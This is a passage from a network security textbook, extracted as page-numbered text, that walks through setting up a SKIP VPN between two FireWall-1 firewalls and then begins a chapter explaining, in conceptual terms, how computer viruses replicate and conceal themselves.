firewall, the \nLotus Notes server remains inaccessible. Once you have passed the firewall authentication, you still need to pass \nthe Notes authentication before you are allowed access to data on the server. \nNote \nLotus Notes uses TCP port 1352 for all client-to-server and server-to-server \ncommunications. \nQuite a few products provide their own authentication and encryption. Some even allow access to additional \nnetwork resources. For example, Citrix’s WinFrame and MetaFrame products provide terminal server capability \nbased on the Windows NT operating system. They also support decent authentication and encryption. This means \nthat users on the Internet can use a Citrix client in order to access the Citrix server through an encrypted session. \n" }, { "page_number": 209, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 209\nOnce connected to the server, users can access any internal applications to which the system administrator has \ngranted them access. \nThe biggest drawback to these alternate solutions is that they require special software to be run on the client in \norder to initiate the connection. You no longer have the service independence of a true VPN solution. This is \nchanging, however, as vendors like Citrix are working to make their products more universally accessible. For \nexample, the latest versions of WinFrame and MetaFrame no longer require the use of a specialized client. You \ncan now use an optional Web browser plug-in which supports the latest versions of Netscape and Internet \nExplorer. \nTip \nA browser plug-in makes an excellent remote solution: a network administrator simply \nneeds to make the plug-in software and configuration file available via a Web server. \nRemote users can then download the required software (about 300KB) and connect to the \nCitrix server using their favorite Web browser. \n \nSetting up a VPN \nLet’s return to the FireWall-1 product we discussed in Chapter 7 in order to walk through the configuration of a \nVPN between two remote networks. While we will specifically be discussing FireWall-1, many of the steps \nrequired to set up the VPN are similar to other products’ setups. The goal is to give you a firm understanding of \nwhat is involved in the configuration process, not to endorse one product over another. \nAs mentioned in Chapter 7, FireWall-1 supports a number of VPN options. These include SKIP, IPSEC, and a \nFireWall-1 proprietary algorithm. In our example, we will be working with SKIP since it provides better \nauthentication than IPSEC (although current trends point to the integration of SKIP capabilities in IPSEC) and is \nan accepted standard. It also supports full tunneling, which allows SKIP to be used in a private address space \nenvironment. \nPreparing the Firewall \nNote \nIf you are unfamiliar with FireWall-1, please review Chapter 7, which covers how to \ninstall and configure the product. \nThis section assumes that you have a working firewall which is capable of providing controlled Internet access. In \nthe course of this procedure, you will notice that the firewall policy has a minimal amount of rules. This has been \ndone solely for clarity in our examples. Your rule set will vary and should include all required policies. \nTip \nPlace encryption rules at the top of the Policy Editor so they will be processed first. \nOur VPN Diagram \nFigure 10.4 shows a network drawing of the VPN you will create. The figure shows two remote network sites. \nOne is behind a firewall named HOLNT200 and the other is behind a firewall named Witchvox. Behind \nHOLNT200 is an FTP server that holds files containing financial information. The goal is to set up a secure tunnel \nso that clients on the other side of Witchvox can retrieve the financial files in a secure manner. Since FTP \ntransmits all data in the clear, you want to use a VPN to insure that your financial information is not compromised. \n" }, { "page_number": 210, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 210\n \nFigure 10.4: An example of a VPN \nConfigure your VPN by defining encryption domains for each end of the VPN tunnel. This identifies which \nremote networks the firewall will exchange encrypted traffic with. For example, you will configure the firewall \nWitchvox to encrypt any traffic headed for the 192.168.1.0 network. Conversely, you will also instruct Witchvox \nto decrypt all traffic received from the 192.168.1.0 network. HOLNT200 will be configured in a similar manner, \nexcept the remote encryption domain is defined as 192.168.3.0. \nConfiguring Required Network Objects \nYour first step is to make sure all required network objects are created. Each firewall will need to have the \nfollowing objects: \nƒ \nA network object or group for the local encryption domain \nƒ \nA network object or group for the remote encryption domain \nƒ \nA workstation object for itself \nƒ \nA workstation object for the remote firewall \nDefining Network Objects \nIf you do not have a local network object defined, you will need to define one now. This can be accomplished \nfrom the Security Policy tab main menu by selecting Manage ¾ Network Objects ¾ New ¾ Network. This will \nproduce the Network Properties screen shown in Figure 10.5. Give this object a name and assign a valid subnet \naddress and mask. Notice that this configuration is being performed on Witchvox, so the Location of the \n192.168.3.0 network object is identified as Internal. Click OK to save this entry. \n" }, { "page_number": 211, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 211\n \nFigure 10.5: The Network Properties screen \nIf you have multiple network segments, define each of them now. Once you have defined all of your network \nobjects, you will also need to create a group object and place each of these network objects inside of it. Later on \nyou will need to define an encryption domain. When identifying the domain, you will only be allowed to specify \none object. If you need to identify multiple network segments, you can do this by specifying the group of your \nnetwork objects. \nOnce you have identified your internal subnets, you must also identify the subnets at the remote encryption \ndomain. Do this by creating additional network objects, just as you did for your local segments. The only \ndifference is that the Location of the object must be defined as External, as shown in Figure 10.6. In Figure 10.6, \nwe are still configuring the Witchvox firewall, so the 192.168.1.0 object is part of the remote network. This is why \nit is identified as being external to the firewall. \nTip \nYou may also wish to assign the remote subnets a unique color so you do not confuse them \nwith your local objects. \n \nFigure 10.6: Remote subnets need to be defined as External. \nDefining the Firewalls \nYou now need to configure the firewall objects. If you have not done so already, create a network object for the \nfirewall by selecting Manage ¾ Network Objects ¾ New ¾ Workstation from the Security Policy tab main menu. \nIn Figure 10.7, you are still configuring the Witchvox firewall and creating a workstation object which will \nrepresent itself. Notice that the configuration uses the IP address from the external NIC on the firewall and that the \nLocation is identified as Internal. \n \nFigure 10.7: The General tab for the Witchvox firewall object \nNext click the Encryption tab to define your local encryption domain and select a method of encryption. This is \nshown in Figure 10.8. Notice that Other is selected under Encryption Domain and the local network object \nspecified. Also notice that SKIP has been selected in the Encryption Schemes Defined. \n" }, { "page_number": 212, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 212\n \nFigure 10.8: The Encryption tab for the Witchvox firewall object \nOnce you have selected SKIP encryption, click the Edit button. This will produce the SKIP Properties window \nshown in Figure 10.9. Notice that there is no key information recorded in this tab. You will need to generate a new \ncertificate authority key in order to authenticate with remote systems. In this configuration, Local is identified as \nthe certificate authority. If you wanted to indicate a different system, you would select Remote and choose a \npredefined object for the certificate authority. \n \nFigure 10.9: The CA Key tab of SKIP Properties \nClick the Generate button to create a new certificate authority key (CA key) for this system. This produces a \ndialog box warning you that you are about to change your SKIP management key. If you already had VPN \nconnections with other sites, this would mean that they would have to manually fetch the new key. Since this is a \nnew configuration, changing keys is not an issue. Click Yes to continue. \nClicking Yes will produce a new dialog box informing you that a new management key is being generated. \nDepending on the processor speed of your system, this could take a few seconds or as long as a minute. Figure \n10.10 shows the CA Key tab after key generation. These keys are unique to this specific system. The keys you \ngenerate should have different values. \n \nFigure 10.10: The CA Key tab after key generation \nOnce the certificate authority keys are generated, select the DH Key tab to generate a new Diffie-Hellman key. \nThis tab resembles the CA Key tab. Click the Generate button to create a new Diffie-Hellman key. Once key \ngeneration is complete, your screen should appear similar to Figure 10.11. \nNote \nLike the certificate authority keys, your Diffie-Hellman key will be unique to your \nsystem, so you will not receive an identical key string to the one shown in the figure. \n" }, { "page_number": 213, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 213\nOnce you have finished, click the Write button to save this key, then click OK. \n \nFigure 10.11: The DH Key tab for SKIP Properties \nNow that you have configured an object for your local firewall, you also need to define an object for the firewall at \nthe other end of the VPN tunnel. This is shown in Figure 10.12. You are still working on Witchvox, but you are \ndefining an object for the firewall HOLNT200. Notice that the system is being associated with its external IP \naddress and that the Location is identified as External. \n \nFigure 10.12: General properties for the HOLNT200 firewall object \nOnce the General tab is filled out, click OK to save. You will not be working with the Encryption tab on the \nHOLNT200 object until you have also defined objects on the remote firewall. You can now click Close on the \nNetwork Objects screen and install these objects onto the firewall. Do this by selecting Policy ¾ Install from the \nSecurity Policy tab main menu. \nConfiguring the Remote Firewall \nNow that you have defined the required objects on Witchvox, you also need to define these objects on \nHOLNT200. The process is identical to the steps you have taken so far, with the following exceptions: \nƒ \nThe 192.168.1.0 subnet will be defined as Internal, not External. \nƒ \nThe 192.168.3.0 subnet will be defined as External, not Internal. \nƒ \nThe HOLNT200 firewall will be defined as Internal, not External. \nƒ \nKeys will be generated for the HOLNT200 object, not Witchvox. \nƒ \nWitchvox will be defined as External, not Internal. \nOnce these objects are created, install them on HOLNT200 by selecting Policy ¾ Install from HOLNT200’s \nSecurity Policy tab main menu. \nExchanging Keys \nIn order to exchange keys, go back to the Witchvox firewall and edit the object you created for HOLNT200. When \nthe Workstation Properties screen for HOLNT200 appears, select the Encryption tab. Under the Encryption \nDomain option, associate the object you create for the 192.168.1.0 network (the remote network which sits behind \nHOLNT200). You should also select SKIP under Encryption Schemes Defined. Your dialog box should appear \nsimilar to Figure 10.13. \n" }, { "page_number": 214, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 214\n \nFigure 10.13: Encryption properties for the remote firewall HOLNT200 \nWhen you click the Edit button in order to manage your SKIP properties, you will notice the screen looks a little \ndifferent from this same screen on the Witchvox object. This is shown in Figure 10.14. Instead of the certificate \nauthority being defined as a local system, Remote is selected, with the HOLNT200 object selected as the remote \nsystem. The Generate button is also missing and has been replaced with a button labeled Get. This is because you \nwill not be generating a new key, but fetching it from HOLNT200. \n \nFigure 10.14: The CA Key tab for HOLNT200’s SKIP Properties \nClick the Get button now to retrieve the remote certificate. This will produce a dialog box that warns that you are \nfetching the keys for HOLNT200 without authentication, in order to certify that it is actually HOLNT200 who is \nsending you the keys. This is normal: this is the first key exchange between the two systems, so you have no \nprevious key information that can be used to authenticate the source. \nYou are also informed that you should manually verify the key values. You can do this by calling the remote \nfirewall administrator and reading off the key values you have received. They should match the key values \ngenerated for their local firewall object. In our example, you could verify that the correct keys were received by \ngoing to the HOLNT200 firewall, editing the HOLNT200 object, and checking the SKIP properties under the \nEncryption tab. \nOnce you have retrieved the certificate authority keys, click the DH Key tab to fetch the Diffie-Hellman key. As \non the CA Key tab, the Generate button has been replaced with a Get button. Click the Get button now in order to \nfetch the key from the remote firewall. Your screen should appear similar to Figure 10.15. As with the certificate \nauthority key, you should manually validate the key value by calling the remote firewall administrator. Click the \nWrite button and then click OK to save the changes you have made to this object. \n" }, { "page_number": 215, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 215\n \nFigure 10.15: The DH Key tab for HOLNT200’s SKIP Properties \nFetching Keys on the Remote Firewall \nWitchvox now has all the key information it needs from HOLNT200. You must now go to the HOLNT200 \nfirewall and edit the Witchvox object so that HOLNT200 can fetch the key information it requires, as well. The \nprocess is identical to what you’ve done, except that the Encryption Domain defined under the Encryption tab on \nWitchvox must indicate the subnet 192.168.3.0 (the subnet sitting behind Witchvox). The rest of the steps are \nidentical. Once HOLNT200 fetches the keys it needs you should manually verify them, as well. \nModifying the Security Policy \nYou have created all of your required network objects and exchanged keys; now you must define a set of policy \nrules so that the firewall knows when to use your VPN. This is done by creating a new rule at the top of the Policy \nEditor and adding both the local and remote networks to the Source and Destination columns. Under the Services \ncolumn, you can leave the default of Any (which will encrypt all traffic between the two encryption domains) or \nyou can select to only encrypt certain services. In the Action column, right-click within the box and select Encrypt. \nYour rules should now appear similar to row 1 in Figure 10.16. \nNote \nBoth the local and the remote encryption domains should appear in the Source and \nDestination columns. \n \nFigure 10.16: Defining the rules about which traffic should be encrypted \nNow you need to define the encryption properties for this specific VPN. This is done by again right-clicking in the \nAction box, only this time you need to select Edit Properties. This will produce the Encryption Properties window \nshown in Figure 10.17. Since FireWall-1 supports multiple forms of encryption, it is possible to use different \nforms of encryption on multiple VPNs. This is why you must specify the type of encryption you wish to use for \nthis VPN tunnel. \n" }, { "page_number": 216, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 216\n \nFigure 10.17: The Encryption Properties window \nIn the Encryption Properties windows, select SKIP and click the Edit button. This will produce the SKIP \nProperties window shown in Figure 10.18. You are allowed to set the following options: \nKij Algorithm This selects the method of encryption to use when the systems exchange Crypt and \nMAC keys. \nCrypt Algorithm This selects the method of encryption to use when encrypting and decrypting \ndata. \nMAC Algorithm This selects the method of encryption to use for authenticating the system at the \nremote end of the VPN tunnel. \nAllowed Peer Gateway This specifies who is allowed to initiate a VPN transmission. If Any is \nselected, then either firewall associated with each encryption domain is allowed to transmit \nencrypted data. If a specific system is indicated, then you will need two separate rules in the \nSecurity Policy Editor. \nNSID This selects how the name space IDs are derived. Selecting None includes the NSID \ninformation within the encapsulation header. \nIPSEC Options One or both of these options must be selected if SKIP is used with IPSEC. The \nESP option selects encryption, and the AH option selects authentication. \n \nFigure 10.18: The SKIP Properties window \nOnce you have defined your SKIP options for this specific VPN connection, click OK twice to save any changes. \nThis should return you to the Security Policy main screen. Now you must install your policy changes in order to \nmake them active. Do this by selecting Policy ¾ Install from the Security Policy tab main menu. This completes \nall the required changes to Witchvox in order to setup your VPN connection. \nModifying the Security Policy on the Remote Firewall \nYou also need to modify the security policy and SKIP properties on HOLNT200. Follow the exact steps used to \nconfigure Witchvox. The policy rules should appear identical to Figure 10.16. You also want to make sure that \n" }, { "page_number": 217, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 217\nyou select the same options under SKIP properties. Once your policy changes are complete on HOLNT200, you \nmust install the policy to make your changes active. \nTesting the VPN \nThe setup of your VPN should now be complete. All that is left is to test the VPN in order to verify that it is \nfunctioning properly. This is accomplished by initiating an FTP session from the 192.168.3.0 network behind \nWitchvox to the FTP server located behind HOLNT200. If you check the firewall log on Witchvox, you should \nsee an outbound session similar to Figure 10.19. Log entry No. 1 shows an FTP session coming from 192.168.3.10 \nwhich is going to 192.168.1.10, which is the IP address of the remote FTP server. Notice that the log indicates that \nthe traffic is being encrypted. \n \nFigure 10.19: The FTP log entry on Witchvox \nSo you know that your FTP session was transmitted successfully. You also need to check the firewall log on \nHOLNT200 in order to insure that the transmission was received properly. This is shown in Figure 10.20. Notice \nthat the log indicates that the firewall had to decrypt this traffic. You may also notice that since the firewall knows \nthe true name of the FTP server (LAB31), it has substituted this name for the destination IP address. \n \nFigure 10.20: The FTP log entry on HOLNT200 \nVerifying the Data Stream \nWhile all of this looks correct, the true test is to break out a network analyzer and decode the traffic being \ntransmitted by the firewalls. While the log entries claim that the traffic is being encrypted and decrypted, it never \nhurts to check. A network analyzer will show you the contents of the packets being transmitted. If you can read the \nfinancial information within the data stream, you know you have a problem. \nFigure 10.21 shows a packet decode of the FTP session before it is encrypted by the firewall. Notice that you can \nclearly distinguish that this is an FTP session. You can also identify the IP addresses of the systems carrying on \nthis conversation. If you review the information in the bottom window, you can even see the data being \ntransferred, which appears to be credit card information. \n \nFigure 10.21: The data stream before it is encrypted \nFigure 10.22 shows the same data stream, but from outside the firewall. This is what an attacker would see who \nwas trying to capture data traveling along the VPN. Notice that the transport protocol for each packet is identified \nas 57. This identifies the transport as being a tunneling protocol and prevents you from seeing the real transport \nused in the encapsulated packet (in this case TCP) or the service that is riding on that transport (in this case FTP). \n" }, { "page_number": 218, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 218\n \nFigure 10.22: The data stream after it is encrypted \nIf you look at the middle window, you will see that the source and destination IP addresses are that of HOLNT200 \nand Witchvox, respectively. You do not see the true source and destination IP addresses of the data stream. This, \ncombined with hiding the transport and service within the encrypted packet, helps to keep any one data \ntransmission from looking more interesting to an attacker than any other. In fact, there is no certain method of \nverifying that all this captured traffic is from a single session. Each packet listed in the top window may be from \ndifferent communication sessions that are taking place simultaneously. In order to find the FTP session, an \nattacker may be forced to decrypt hundreds or even thousands of packets. \nThe real test is the bottom window. Note that your data is now scrambled into ciphertext and is no longer readable. \nThis prevents an attacker from being able to read the enclosed data, as you could in Figure 10.21. In order to get to \nthis information, an attacker would need to identify which packets contain the financial information and decrypt \nthem with a brute force attack. \nGiven these two packet traces, it is safe to say that your VPN is functioning properly and encrypting the data that \nflows between the two encryption domains. \n \nSummary \nIn this chapter we defined the term virtual private networking and discussed when it is beneficial to \nuse a VPN. We also covered what you should look for in a VPN product and what your options are \nfor deployment. Finally, we walked through the configuration of a VPN between two firewalls and \nlooked at the effect it had on the passing data stream. \nIn the next chapter, you will look at viruses and how you can go about keeping these little pieces of \ndestructive code off your network. \n \nChapter 11: Viruses, Trojans, and Worms: Oh My! \nJust about every system administrator has had to deal with a virus at one time or another. This fact \nis extremely disheartening, because these tiny pieces of code can cause an immense amount of \ndamage. The loss in productivity and intellectual property can be expensive for any organization. \nClearly, the cost of recovering from a virus attack more than justifies the cost of taking preventive \nmeasures. \nViruses: The Statistics \nWhile the early 1990’s seemed to be an era of relative safety from viruses, the Internet has—\nand continues to—dramatically increase the threat computer systems face from hostile code. \nAn NCSA (National Center for Supercomputing Applications) study in 1997 illustrated the \nthen-phenomenal statistic that 99.33 percent of the organizations polled had experienced a \nrecent virus episode. In 1996, the monthly infection rate was 10 out of every 1,000 computers. \n" }, { "page_number": 219, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 219\nIn 1997, this rate more than tripled. In a study released in October 2000, ICSA (now \nTruSecure) noted that virus incidents per 1,000 machines were at least doubling every year—\nfor five years running—with 160 machines per 1000 having been infected in 2000. Other items \nnoted in the study: \nƒ Annual losses per company due to virus infection were in the hundreds of thousands. \nƒ Of companies surveyed, over 40 percent had experienced data loss due to virus infections. \nƒ Two-thirds of companies had file-related e-mail problems due to incoming viruses. \nƒ Only one of the surveyed companies recorded never having had a virus during the year \ncovered by the survey—illustrating an infection rate of 99.67 percent. \nƒ Major virus infections (25 or more computers infected at once) happened to 51 percent of \nthe companies. \nƒ Of the 51 percent with major infections, 80 percent received the virus by way of e-mail \nattachments. \nƒ 64 percent of server outages due to virus infections lasted more than an hour, with a \nmedian downtime of 21 hours. \nƒ Only 70 percent of PCs were protected with full-time automatic anti-virus protection. \nƒ 76 percent of organizations polled believed the virus problem was worse than the year \nbefore (1999). \nOn an interesting note, the survey noted that reports of boot viruses, or floppy-born viruses, \nwere nearly nonexistent. This seems in direct contrast to the NCSA survey of 1997, which put \nthe brunt of the blame on shared floppy disks. With file sharing now being done primarily \nthrough e-mail, it’s natural that the Internet has become a replacement for the floppy disk as \nthe carrier of malicious code. \nNote \nBut viruses aren’t just for computers anymore. In August 2000, the first malicious \ncode affecting PDA’s (Personal Digital Assistants) was recorded. The program, \nLiberty Crack, posed as an emulator, but in reality it wiped applications from \nhandheld devices running the Palm OS. And in June of the same year, the \nTimofonica virus, although executed on computers, was designed to send text \nmessages to all cell phones in Spain—potentially overwhelming the entire cell \nnetwork. \n \nWhat Is a Virus? \nThe precise definition of a virus has been hotly debated for many years. Experts have had difficulty describing the \nspecific traits that characterize a true virus and separate it from other types of programs. To add to the confusion, \npeople tend to lump viruses, worms, Trojan horses, and so on, under the generic umbrella of “virus.” This is partly \nbecause there is not one industry-acceptable descriptor that includes all of these program types; there continues to \nbe some confusion over the exact definition of what constitutes a virus. \nThe generally accepted definition of a virus is a program that can be broken up into three functional parts. These \nparts are \nƒ Replication \nƒ Concealment \nƒ Bomb \nThe combination of these three attributes makes the collective program a virus. \n" }, { "page_number": 220, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 220\nReplication \nA virus must include some method of replication, that is, some way to reproduce or duplicate itself. When a virus \nreproduces itself in a file, this is sometimes referred to as infection. Since most people would never knowingly \nload a virus on their system, replication insures that the virus has some method of spreading. \nReplication occurs when the virus has been loaded into memory and has access to CPU cycles. A virus cannot \nspread by simply existing on a hard disk. This means that an infected file must be executed in order for a virus to \nbecome active. “Executed” is a generic term. This could refer to an infected executable file that has been initiated \nfrom a command prompt, or it could be an infected Microsoft Word document that has been loaded into a text \neditor that is capable of processing embedded macros. In either event, there is now some process using CPU \ncycles that helps to spread the virus code. \nFile Infection \nThe method of replication falls into one of two categories. The first is file infection. This method of replication \nrelies on the virus’s ability to attach itself to a file. In theory, any type of file is vulnerable to attack. Attackers tend \nto focus, however, on files that will provide some form of access to CPU cycles. This may be through direct \nexecution or by having the code processed by some secondary application. \nFor example, a Word document does not directly execute any type of commands in memory. The application \nMicrosoft Word, however, is capable of reading macro commands embedded within the Word document and \nexecuting them in memory. So while it is the Word document that is actually infected, it is the Word application \nthat provides the transport for replication. \nA similar type of virus was popular many years ago that leveraged vulnerabilities in DOS’s ANSI.SYS driver. \nAny text document can contain embedded ANSI commands. If a user had the ANSI driver loaded, these \ncommands could be parsed from a text file and executed, even if the user was simply viewing the text within the \nfile. There have even been viruses that embed themselves in raw source code files. When the code is eventually \ncompiled, the virus becomes capable of accessing CPU cycles, thus replicating even further. \nThe most popular type of infection, however, is to infect direct executable files. In the PC world, these are files \nwith a COM, EXE, PE, or BAT file extension. A virus will add a small piece of code to the beginning of the file. \nThis is to insure that when the file is executed, the virus is loaded into memory before the actual application. The \nvirus will then place its remaining code within or at the end of the file. \nOnce a file becomes infected, the method of replication can take one of two forms. These are referred to as \nresident and nonresident replication. A resident replicating virus, once loaded into memory, waits for other \nprograms to be executed and then infects them when they are. Viruses such as Cabanas have shown that this is \neven possible on protected-memory systems such as Windows NT. A nonresident replicating virus will select one \nor more executable files on disk and directly infect them without waiting for them to be processed in memory. \nThis will occur every time the infected executable is launched. \nSometimes a virus may take advantage of the extension search order of the operating system in order to facilitate \nthe loading of the virus code without actually infecting the existing file. This type of virus is known as a \ncompanion virus. A companion virus works by insuring that its executable file is launched before the legitimate \none is launched. \nFor example, let’s say you have an accounting program that you initialize by executing the file GL.EXE. If you try \nto launch your accounting program by simply typing gl, an attacker could generate a virus named GL.COM that \nloads itself into memory and then passes control over to the GL.EXE file. This is possible because when a file \nextension is not specified, DOS and Windows will first try to execute a file with a COM extension, then an EXE \nextension, and finally a BAT extension. Once a match is found, the operating system ends the search and executes \nthe program. In our example, the operating system would find the virus file (COM extension) before the real \nprogram file (EXE extension) and execute the virus file. \nBoot Sector Replication \nThe second category of replication is boot sector replication. These viruses infect the system area of the disk that \nis read when the disk is initially accessed or booted. This can include the master boot record, the operating \nsystem’s boot sector, or both. \nNote \nViruses that use both file and boot sector replication technologies are known as multi-\npartite. \nA virus infecting these areas will typically take the system instructions it finds and move them to some other area \non the disk. The virus is then free to place its own code in the boot record. When the system initializes, the virus \nloads into memory and simply points to the new location for the system instructions. This allows the system to \nboot in a normal fashion—except the virus is now resident in memory. \nNote \nA boot sector virus does not require you to execute any programs from an infected disk in \norder to facilitate replication. Simply accessing the disk is sufficient. For example, most \nPCs will do a systems check on boot up that verifies the operation of the floppy drive. \n" }, { "page_number": 221, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 221\nEven this verification process is sufficient to activate a boot sector virus, if one exists on a \nfloppy left in the machine. This can cause the hard drive to become infected, as well. \nBoot sector viruses rely on disk-to-disk contact to facilitate replication. Both disks must be attached to the same \nmachine. For example, if you access a shared directory on a system with a boot sector virus, the virus cannot \nreplicate itself to your local machine. This is because the two machines do not share memory or processor cycles. \nThere are, however, programs known as droppers that can augment the distribution of boot sector viruses, even \nacross a network. A dropper is effectively an installation utility for the virus. The dropper is typically coded to \nhide the virus contained within it and escape detection by anti-virus software. It also poses as some form of useful \nutility in order to entice a user to execute the program. When the dropper program is executed, it installs the virus \non the local system. \nNote \nBy using a dropper, an attacker could theoretically infect a system with a boot sector virus \neven across a network. Once the virus has been dropped, however, disk-to-disk access is \nrequired for further replication. \nCommon Traits of File Infection and Boot Sector Replication \nWhat is common to file and to boot sector replication is that a virus must have some method of detecting itself. \nThis is to avoid potential corruption by performing a double infection. If a corruption does occur, the program may \nbecome unusable or the user may suspect that something is wrong. In either event, the replication process may \ncease. If replication cannot continue, the virus is doomed to die out, just like any living organism. \nAn Interesting Catch-22 \nOne of the methods used by virus programmers to insure that duplication does not occur can also be used to detect \nthe virus and prevent it from infecting files. Many virus programmers identify a code string that they know is \nunique to their particular virus. The virus is then programmed to look for this code string before it infects a file. If \na match is found, the file is not infected. \nAnti-virus software can be programmed to look for this signature code string. This allows the software to quickly \nidentify the existence of the virus. Also, by adding this code string to a file without the actual virus code, the file \ncan be inoculated against infection by the actual virus. \n \nMacro Viruses \nMacro viruses are executed by an application, as opposed to an operating system, and therefore are operating \nsystem independent. Written in Visual Basic for Applications (VBA) and executed by one of the programs in \nMicrosoft’s Office suite (Word, Excel or Access), macro viruses are hidden in documents and spreadsheets and \nspread by typically infecting other similar documents, although occasionally they can infect, damage, or destroy \nother files on the system. \nAccording to the ICSA, macro viruses account for 80 percent of all known viruses, and the known number is \ngrowing at a rate that is unprecedented in computer history. The danger of macro viruses lies in their ability to \ninfect files at any stage of the application use, whether opening, saving, or editing (or even deleting) a document. \nAnd because VBA is easy to learn and program, the technical level of expertise necessary to create a macro virus \nis very low. \nConcealment \nIn order to facilitate replication, a virus must have one or more methods of masking its existence. If a running \nvirus were to simply show up on your Windows 98 Taskbar, you’d see right away that there was a problem. \nViruses employ a number of methods to camouflage their presence. \nSmall Footprint \nViruses tend to be very small. Even a large virus can be less than 2KB in size. This small footprint makes it far \neasier for the virus to conceal itself on the local storage media and while it is running in memory. In order to \ninsure that a virus is as small as possible, most viruses are coded using assembly language. \nIf a virus is small enough, it may even be able to attach itself to a file without noticeably affecting the overall file \nsize. There are viruses known as cavity viruses that will look for repetitive character sequences within a file \n" }, { "page_number": 222, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 222\n(usually a null value) and overwrite this area for virus storage. This allows the virus to store the bulk of its code \nwithin a file without affecting the reported file size. \nAttribute Manipulation \nIn order to protect files from virus infection, early DOS computer users would set their executable file permissions \nto read-only. The thinking was that if the file could not be modified, a virus would be unable to infect it. Of \ncourse, virus programmers responded by adding code to the virus that allowed it to check the file’s attributes \nbefore infection. If the attributes were set to read-only, the virus would remove the read-only attribute, infect the \nfile, and then set the attributes back to their original values. Needless to say, this method of protection is of little \nvalue against modern viruses. \nThis is not true in a true multi-user environment, however, where the permissions level can be set on a user-by-\nuser basis. If administrator-level privileges are required to change a file’s permissions, the virus cannot change \nthese attributes when run from a regular user account. \nFor example, in a NetWare server environment, regular users are given read-only access to the public directory. If \na user’s computer contracts a virus, the virus will be unable to spread to other machines by infecting files within \nthe public directory, because the virus will be unable to modify these files. Of course, if the administrator’s \ncomputer becomes infected, all bets are off—this account does have write access to the public directory. Setting \nthe minimum level of required permissions not only helps to enhance security—it can help to prevent the spread of \nviruses, as well. \nNote \nInterestingly, this lack of account security is at the root of why viruses have flourished in \nDOS, Windows 9x, and Mac environments. There have been very few viruses written for \nUNIX and Windows NT/2000 because the ability to set file permissions hinders the \nvirus’s ability to replicate and infect additional files. This is one of the reasons why virus \nprogrammers have focused on other platforms. \nAlong with permission attributes, viruses can also modify the date and time stamps associated with a file. This is \nto insure that a user is not clued in to a problem by noticing that a file has been modified. Early virus scanners \nwould look for date changes as part of their virus-detection routine. Since most modern viruses will restore the \noriginal date and time stamps after infection, this method of detection has become less than effective. \nNote \nWindows NT systems running NTFS are particularly vulnerable due to the use of \ndata streams. A data stream is a hidden file that can be associated with a regular \nfile. This provides a hidden area for an attacker to hide virus code. Data streams \nare not visible when you use Explorer or the DIR command. You must reference \nthe stream directly (meaning you already know it exists) or by using a tool \nspecifically designed to find data streams, such as LADS (List Alternate Data \nStreams), freeware that can be downloaded at www.heysoft.de/nt/ep-lads.htm. \nStealth \nStealth allows a virus to hide the modifications made to a file or boot sector. When the virus has been loaded into \nmemory, it monitors system calls made to files and disk sectors. When a call is trapped, the virus modifies the \ninformation returned to the process making the call so that it sees the original, uninfected information. This aids \nthe virus in avoiding detection. \nFor example, many boot sector viruses contain stealth ability. If the infected disk is booted (thus loading the virus \ninto memory), programs such as FDISK will report a normal boot record. This is because the virus is intercepting \nsector calls from FDISK and returning the original boot sector information. If you boot the system from a clean \nfloppy disk, however, the drive will be inaccessible. If you run FDISK again, the program will report a corrupted \nboot sector on the drive. \nConcealment can also be accomplished by modifying the information reported by utilities such as DIR and MEM. \nThis allows a virus to hide its existence on the local storage medium and in physical memory. To use stealth, \nhowever, the virus must be actively running in memory. This means that the stealth portion of the virus is \nvulnerable to detection by anti-virus software. \nCountermeasures \nSome viruses include countermeasures to fight back against detection. These viruses will monitor the system for \nindications of an active virus scan, then take preventive measures to insure that they go undetected. Think of this \nas stealth ability with an attitude. \n" }, { "page_number": 223, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 223\nFor example, some viruses will monitor system activity once they become active in memory. If the virus detects \nthat a virus scan has been initiated, it will attempt to fool the scanner into thinking that some other virus is present \non the system. Typically, the reported virus will require some form of destructive cleaning that will trash the \nsystem if the virus is not actually present. The virus will then attempt to seed itself within the file system so that if \na recovery is attempted, the virus can infect the new configuration. \nLike stealth, these countermeasures rely on the virus’s being active in memory so the virus can monitor activity. \nThis is why it is so important to boot a system from a boot disk you know to be clean before you attempt any \nrepair. On DOS systems, it is also important to actually power cycle the system: many viruses are capable of \ntrapping the CTRL+ALT+DEL key sequence and creating a false warm boot. This allows the virus to remain \nactive in memory, even though it appears the system has been restarted. \nEncryption \nVirus programmers have not overlooked the benefits of encryption. Encryption allows the virus programmer to \nhide telltale system calls and text strings within the program. By encrypting the virus code, virus programmers \nmake the job of detecting the virus much more difficult. \nDetection is not impossible, however, as many viruses use a very simple form of encryption and the same key for \nall virus code. This means that while it may be difficult to retrieve the actual virus code, the decryption sequence \nwill be identical for all infected files. If the decryption key can be broken, it can be used to detect all future \ninstances of the virus. Even if the decryption key is not broken, the cipher string becomes a telltale signature that \nanti-virus software can use to detect the virus. \nThe efficiency of this method of detecting encrypted viruses depends on the resulting cipher string. Remember that \nthe anti-virus software has no way of knowing whether it is looking at encrypted or plain text information. If the \ncipher string can be made to resemble some benign form of code, the anti-virus software will have a difficult time \ndifferentiating between infected and non-infected files. \nPolymorphic Mutation \nA polymorphic virus has the ability to change its virus signature from infected file to infected file while still \nremaining operational. Many virus scanners detect a virus by searching for telltale signature code. Since a \npolymorphic virus is able to change its appearance between infections, it is far more difficult to detect. \nOne way to produce a polymorphic virus is to include a variety of encryption schemes that use different \ndecryption routines. Only one of these routines would be available in any instance of the virus. This means that an \nanti-virus scanner will be unable to detect all occurrences of the virus unless all the decryption routines are known. \nThis may be nearly impossible if the virus utilizes a random key or sequence when performing encryption. For \nexample, many viruses include benign or dormant code that can be moved around within the virus before \nencryption without affecting the virus’s operational ability. The cipher string created by the process will vary with \neach instance of the virus, because the code sequence will vary. \nThe most efficient method of creating a polymorphic 